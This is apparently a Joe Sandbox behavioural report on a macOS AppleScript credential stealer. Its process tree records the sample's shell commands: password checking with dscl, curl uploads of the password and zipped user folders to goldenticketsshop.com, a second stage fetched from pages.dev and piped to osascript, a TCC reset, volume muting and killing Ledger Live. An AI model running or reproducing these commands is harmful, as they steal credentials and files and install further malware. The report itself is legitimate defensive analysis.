Edit tour

macOS Analysis Report
payload_1_stealer.scpt

Overview

General Information

Sample name:	payload_1_stealer.scpt
Analysis ID:	5177034
Has dependencies:	false
MD5:	891b1bf224a59baa80e0ed0c08a08131
SHA1:	b463cfbeb11a86b0650a42667794ae888791913d
SHA256:	5d8a374139573798e23de60d1ca1610f6d1abecd5d17ecf32c82f1cfd338e03f
Infos:

Detection

Digit Stealer

Score:	88
Range:	0 - 100

Signatures

Exfiltrates password data via HTTP using curl

Kills crypto wallet applications indicative for crypto stealers

Yara detected Digit Stealer

Clears all privacy permission grants using tccutil

Executes the "dscl" command with authonly argument (probably to verify the login password)

Mutes the volume using AppleScript likely to hide suspicious activity from the user

Terminates several processes with shell command 'killall'

Uploads files by emulating a filled-in form

Writes files containing the user's password

Creates hidden files, links and/or directories

Executes AppleScripts and/or other OSA language scripts with shell command "osascript"

Executes commands using a shell command-line interpreter

Executes cryptographic hash commands used for computing and checking message digests

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "mkdir" command used to create folders

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Executes the "rm" command used to delete files or directories

Executes the "system_profiler" command used to collect detailed system hardware and software information

Executes the "tccutil" command used to manage privacy permissions controlled by TCC (Transparency, Consent, and Control)

Executes the "uuidgen" command used to generate UUIDs

Many shell processes execute programs via execve syscall (might be indicative of malicious behavior)

Uses AppleScript framework/components containing AppleScript related functionalities

Uses AppleScript scripting additions containing additional functionalities for AppleScripts

Writes ZIP files to disk

Classification

General Information

Joe Sandbox version:
Analysis ID:	5177034
Start date and time:	2026-01-14 15:17:02 +01:00
Joe Sandbox product:	Cloud
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultmacinteractivecookbook.jbs
Analysis system description:	Mac Mini, Apple Silicon ARM64, Sequoia (Office 2021, Java 8 Update 471, Adobe Acrobat Reader 25, Chrome 142, Firefox 145, Node.js 24.11.1, NPM 11.6.2)
macOS major version:	15
CPU architecture:	arm64
Analysis Mode:	default
Sample name:	payload_1_stealer.scpt
Detection:	MAL
Classification:	mal88.troj.spyw.evad.macSCPT@0/28@5/0

Warnings

Excluded IPs from analysis (whitelisted): 17.253.3.137, 17.253.3.141, 17.253.15.132, 17.253.57.202, 17.253.15.136, 17.253.57.200, 173.222.168.250, 17.253.15.150, 17.253.37.210, 17.253.53.205, 17.253.37.201, 17.253.53.208, 17.253.15.162, 17.253.29.204, 17.253.29.210, 64.78.200.1, 17.132.88.112, 17.132.88.120, 17.253.96.119, 64.78.201.1, 17.132.88.117, 17.253.144.10, 17.253.57.195, 17.253.57.199, 23.44.201.178, 23.44.201.187, 17.171.47.23, 17.253.3.140, 17.253.3.134, 23.59.144.237, 23.59.144.201, 17.253.57.198, 17.253.57.196, 17.253.15.140, 23.50.131.77
Excluded domains from analysis (whitelisted): www-apple-com.v.aaplimg.com, pancake.apple.com, pancake.g.aaplimg.com, gdmf.apple.com, app-site-association.cdn-apple.com, app-site-association.cdn-apple.com.akadns.net, e5977.dsce9.akamaiedge.net, configuration-lb.ls-apple.com.akadns.net, www.apple.com, configuration-row-lb.apple.com.akadns.net, configuration.ls.apple.com, gdmf.v.aaplimg.com, doh.dns.apple.com, e3925.dscg.akamaiedge.net, a1091.dscapi7.akamai.net, app-site-association.g.aaplimg.com, stocks-data-service.lb-apple.com.akadns.net, experiments.apple.com, ab.apple.com.akadns.net, e6858.dsce9.akamaiedge.net, configuration.ls.v.aaplimg.com, experiments.apple.com.edgekey.net, doh-dns-apple-com.v.aaplimg.com, stocks-data-service-row.lb-apple.com.akadns.net, mesu-cdn.origin-apple.com.akadns.net, apple.com, apps-mzstatic-lb.itunes-apple.com.akadns.net, mesu.g.aaplimg.com, www.apple.com.edgekey.net, weatherkit.apple.com, apps-mzstatic-cdn.itunes-apple.com.akadns.net, configuration.v.aaplimg.com, stocks-data-se
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many JMT_LOOKUP calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

⊘Runtime messages are not available for Live Interaction sessions

Process Tree

System is mac-arm-sequoia

launchd New Fork (PID: 1659, Parent: 1)

xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy com.apple.AuthenticationServicesCore.AuthenticationServicesAgent

AuthenticationServicesAgent (MD5: 51b6e9f57b972003f862cbee0a018d22) Arguments: /System/Cryptexes/App/usr/libexec/AuthenticationServicesAgent

Terminal New Fork (PID: 1661, Parent: 437)

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: -bash

bash New Fork (PID: 1663, Parent: 1662)

bash New Fork (PID: 1664, Parent: 1663)

path_helper (MD5: 19a4db31fd1c2f359e98b84bf8b4738c) Arguments: /usr/libexec/path_helper -s

bash New Fork (PID: 1665, Parent: 1662)

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -m 700 -p /Users/jess/.bash_sessions

bash New Fork (PID: 1666, Parent: 1662)

bash New Fork (PID: 1667, Parent: 1666)

touch (MD5: c293312b66ea9feb646a6ab17eb8fea6) Arguments: /usr/bin/touch /Users/jess/.bash_sessions/75A3C1DC-74DD-49F5-A23E-2D938806E22F.historynew

bash New Fork (PID: 1676, Parent: 1662)

osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript payload_1_stealer.scpt

osascript New Fork (PID: 1677, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c system_profiler SPHardwareDataType | awk -F': ' '/Hardware UUID/ {print $2}' | md5

bash New Fork (PID: 1678, Parent: 1677)

system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: system_profiler SPHardwareDataType

system_profiler New Fork (PID: 1681, Parent: 1678)

system_profiler (MD5: 917b2aeeaa665167730054c51b2e401a) Arguments: /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full

bash New Fork (PID: 1679, Parent: 1677)

awk (MD5: 23e179705448b4852c2872f3fb21e64e) Arguments: awk -F: /Hardware UUID/ {print $2}

bash New Fork (PID: 1680, Parent: 1677)

md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5

osascript New Fork (PID: 1683, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c uuidgen

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c uuidgen

uuidgen (MD5: 802746000e26887a8877aea77e22a9c7) Arguments: uuidgen

osascript New Fork (PID: 1684, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo 'F6755809-1549-4438-86BA-7B8DDC85498B' | tr -d '\n' | md5

bash New Fork (PID: 1685, Parent: 1684)

bash New Fork (PID: 1686, Parent: 1684)

tr (MD5: cf3665845ff99ebd92786f71887ecbfe) Arguments: tr -d \n

bash New Fork (PID: 1687, Parent: 1684)

md5 (MD5: 2d57517294ccc647bc9725bb97e5550e) Arguments: md5

osascript New Fork (PID: 1688, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tail -n 1 /tmp/wid.txt

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tail -n 1 /tmp/wid.txt

tail (MD5: 63ce395284bfbe6de4a23d8e04437d0c) Arguments: tail -n 1 /tmp/wid.txt

osascript New Fork (PID: 1699, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c /usr/bin/dscl /Local/Default -authonly jess '123456'

dscl (MD5: e65212ab7a555d70d0b19a2badc318b0) Arguments: /usr/bin/dscl /Local/Default -authonly jess 123456

osascript New Fork (PID: 1700, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl --retry 10 --retry-delay 10 --max-time 10 -d 'hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456' https://goldenticketsshop.com/api/credentials >/dev/null 2>&1 &

bash New Fork (PID: 1701, Parent: 1700)

nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 10 -d hwid=53210679051327234f0b2e6abf37d5d7&wid=unknown&user=jess&pass=123456 https://goldenticketsshop.com/api/credentials

osascript New Fork (PID: 1702, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo $HOME

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo $HOME

osascript New Fork (PID: 1703, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c echo '123456' >> '/Users/jess/.53210679051327234f0b2e6abf37d5d7.txt'

osascript New Fork (PID: 1705, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c tccutil reset All

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c tccutil reset All

tccutil (MD5: bfc1833a20a58a5f31aa4731c1d8216f) Arguments: tccutil reset All

osascript New Fork (PID: 1736, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Desktop

osascript New Fork (PID: 1740, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Documents

osascript New Fork (PID: 1741, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Downloads

osascript New Fork (PID: 1742, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/a5b9845c461d901dad1363386bac5a75/Notes

osascript New Fork (PID: 1743, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && zip -r '/tmp/a5b9845c461d901dad1363386bac5a75.zip' a5b9845c461d901dad1363386bac5a75

bash New Fork (PID: 1744, Parent: 1743)

zip (MD5: 2e76e4c228d7c01108eeee4f5277037c) Arguments: zip -r /tmp/a5b9845c461d901dad1363386bac5a75.zip a5b9845c461d901dad1363386bac5a75

osascript New Fork (PID: 1745, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --retry 10 --retry-delay 10 --max-time 3600 -F 'file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip' -F 'hwid=53210679051327234f0b2e6abf37d5d7' -F 'wid=unknown' -F 'user=jess' https://goldenticketsshop.com/api/grabber

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --retry 10 --retry-delay 10 --max-time 3600 -F file=@/tmp/a5b9845c461d901dad1363386bac5a75.zip -F hwid=53210679051327234f0b2e6abf37d5d7 -F wid=unknown -F user=jess https://goldenticketsshop.com/api/grabber

osascript New Fork (PID: 1814, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -rf /tmp/a5b9845c461d901dad1363386bac5a75

rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -rf /tmp/a5b9845c461d901dad1363386bac5a75

osascript New Fork (PID: 1815, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/a5b9845c461d901dad1363386bac5a75.zip'

rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/a5b9845c461d901dad1363386bac5a75.zip

osascript New Fork (PID: 1816, Parent: 1676)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c nohup curl -fsSL 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx' | osascript >/dev/null 2>&1 &

bash New Fork (PID: 1817, Parent: 1816)

nohup (MD5: 1775c434908723c7b7eedd9b05a0118a) Arguments: nohup curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl -fsSL https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx

bash New Fork (PID: 1818, Parent: 1816)

osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript

osascript New Fork (PID: 1820, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c osascript -e 'set volume with output muted'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c osascript -e 'set volume with output muted'

osascript (MD5: 5f83ecd5cfb91995b8ef3b640215348f) Arguments: osascript -e set volume with output muted

osascript New Fork (PID: 1821, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c mkdir -p '/tmp/downloaded_parts'

mkdir (MD5: ba85abfff38bf449dbf250cdf2870aa3) Arguments: mkdir -p /tmp/downloaded_parts

osascript New Fork (PID: 1823, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c rm -f '/tmp/app.asar.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c rm -f '/tmp/app.asar.zip'

rm (MD5: 9cd9b128dbecc357fa3dcce5de63a3f2) Arguments: rm -f /tmp/app.asar.zip

osascript New Fork (PID: 1824, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part1.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx'

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part1.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part1.aspx

osascript New Fork (PID: 1825, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part1.aspx' >> '/tmp/app.asar.zip'

bash New Fork (PID: 1826, Parent: 1825)

cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part1.aspx

osascript New Fork (PID: 1827, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part2.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx'

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part2.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part2.aspx

osascript New Fork (PID: 1831, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part2.aspx' >> '/tmp/app.asar.zip'

bash New Fork (PID: 1832, Parent: 1831)

cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part2.aspx

osascript New Fork (PID: 1833, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o '/tmp/downloaded_parts/part3.aspx' 'https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx'

curl (MD5: ad602a7e6e02370d461bde3080879c0d) Arguments: curl --max-time 3600 --retry 10 --retry-delay 5 --retry-max-time 3600 -f -C - -o /tmp/downloaded_parts/part3.aspx https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/app.asar.zip.part3.aspx

osascript New Fork (PID: 1835, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cat '/tmp/downloaded_parts/part3.aspx' >> '/tmp/app.asar.zip'

bash New Fork (PID: 1836, Parent: 1835)

cat (MD5: db480a7daa19962acfe687365ddf3667) Arguments: cat /tmp/downloaded_parts/part3.aspx

osascript New Fork (PID: 1837, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c cd /tmp && unzip -o '/tmp/app.asar.zip'

bash New Fork (PID: 1838, Parent: 1837)

unzip (MD5: 7d81bfe1a6d84df1bbbcc3af8e7be0dc) Arguments: unzip -o /tmp/app.asar.zip

osascript New Fork (PID: 1839, Parent: 1818)

sh (MD5: 9189ebe0e9149b00400e748ae37a84ad) Arguments: sh -c killall 'Ledger Live' || true

bash (MD5: 83116cbffb2ff98b687b909de76e7bc2) Arguments: sh -c killall 'Ledger Live' || true

bash New Fork (PID: 1840, Parent: 1839)

killall (MD5: ab923814083d0c666a3716402eac3530) Arguments: killall Ledger Live

launchd New Fork (PID: 1724, Parent: 1)

xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.Notes.1152921500311893562.1152921500311893567

Notes (MD5: 7105c07ed36ce8aa97a926c6016d8529) Arguments: /System/Applications/Notes.app/Contents/MacOS/Notes

launchd New Fork (PID: 1753, Parent: 1)

xpcproxy (MD5: 8fca306961007faa26bb13e891025ec9) Arguments: xpcproxy application.com.apple.systempreferences.1152921500311901955.1152921500311901960

System Settings (MD5: b0e7acffcbec74a202bf0ceaaec4d470) Arguments: /System/Applications/System Settings.app/Contents/MacOS/System Settings

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
payload_1_stealer.scpt	JoeSecurity_DigitStealer	Yara detected Digit Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: /bin/bash (PID: 1680)	Hash command executable: /sbin/md5 -> md5			Jump to behavior
Source: /bin/bash (PID: 1687)	Hash command executable: /sbin/md5 -> md5			Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.137.162.3
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.201
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.201
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.201
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.21.142
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.57.146.59
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.205
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.205
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.205
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.150.10
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.145.10
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.150.10
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.145.10
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.150.10
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.150.10
Source: unknown	UDP traffic detected without corresponding DNS query: 17.253.150.10

Source: global traffic	HTTP traffic detected: GET /32f763b45cec3531f39b5365edf2c97e.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: /accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /app.asar.zip.part1.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: /accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /app.asar.zip.part2.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: /accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /app.asar.zip.part3.aspx HTTP/1.1host: 67e5143a9ca7d2240c137ef80f2641d6.pages.devuser-agent: curl/8.7.1accept: /accept-encoding: identity

Source: global traffic	DNS traffic detected: DNS query: h3.media.apple.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: icloud.com
Source: global traffic	DNS traffic detected: DNS query: goldenticketsshop.com
Source: global traffic	DNS traffic detected: DNS query: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev

Source: payload_1_stealer.scpt	String found in binary or memory: https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx
Source: payload_1_stealer.scpt	String found in binary or memory: https://goldenticketsshop.com

Source: unknown	Network traffic detected: HTTP traffic on port 49160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57888
Source: unknown	Network traffic detected: HTTP traffic on port 57888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58027
Source: unknown	Network traffic detected: HTTP traffic on port 58020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58022
Source: unknown	Network traffic detected: HTTP traffic on port 58022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49159
Source: unknown	Network traffic detected: HTTP traffic on port 57889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58028
